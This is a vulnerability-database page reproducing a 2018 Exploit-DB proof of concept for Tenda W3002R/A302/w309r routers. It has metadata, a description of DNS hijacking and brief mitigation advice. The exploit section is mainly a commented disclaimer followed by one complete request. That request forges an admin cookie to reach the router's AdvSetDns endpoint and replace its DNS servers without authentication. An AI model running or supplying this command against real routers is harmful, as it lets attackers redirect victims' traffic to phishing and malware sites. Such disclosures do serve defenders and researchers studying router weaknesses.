Tenda W3002R/A302/w309r Wireless Router V5.07.64_en Cookie Session Weakness Remote DNS Change PoC

vendor:

W3002R/A302/w309r Wireless Router

by:

Todor Donev

4.3

CVSS

MEDIUM

Remote DNS Change

200

CWE

Product Name: W3002R/A302/w309r Wireless Router

Affected Version From: V5.07.64_en

Affected Version To: V5.07.64_en

Patch Exists: YES

Related CWE: N/A

CPE: h:tenda:w3002r_a302_w309r_wireless_router

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

Tenda W3002R/A302/w309r Wireless Router V5.07.64_en Cookie Session Weakness Remote DNS Change PoC

Once modified, systems use foreign DNS servers, which are usually set up by cybercriminals. Users with vulnerable systems or devices who try to access certain sites are instead redirected to possibly malicious sites. Modifying systems' DNS settings allows cybercriminals to perform malicious activities like steering unknowing users to bad sites, replacing ads on legitimate sites, controlling and redirecting network traffic, and pushing additional malware.

Mitigation:

Users should ensure that their systems are running the latest version of the firmware and that they have enabled the latest security features. Additionally, users should be aware of the risks of using public Wi-Fi networks and should avoid connecting to them whenever possible.

Source

Exploit-DB raw data:

#
#
#  Tenda W3002R/A302/w309r Wireless Router V5.07.64_en
#  Cookie Session Weakness Remote DNS Change PoC
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg
#
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
 

GET -H "Cookie: admin:language=en; path=/" "http://<TARGET>/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=<DNS1>&DS2=<DNS2>" 2>/dev/null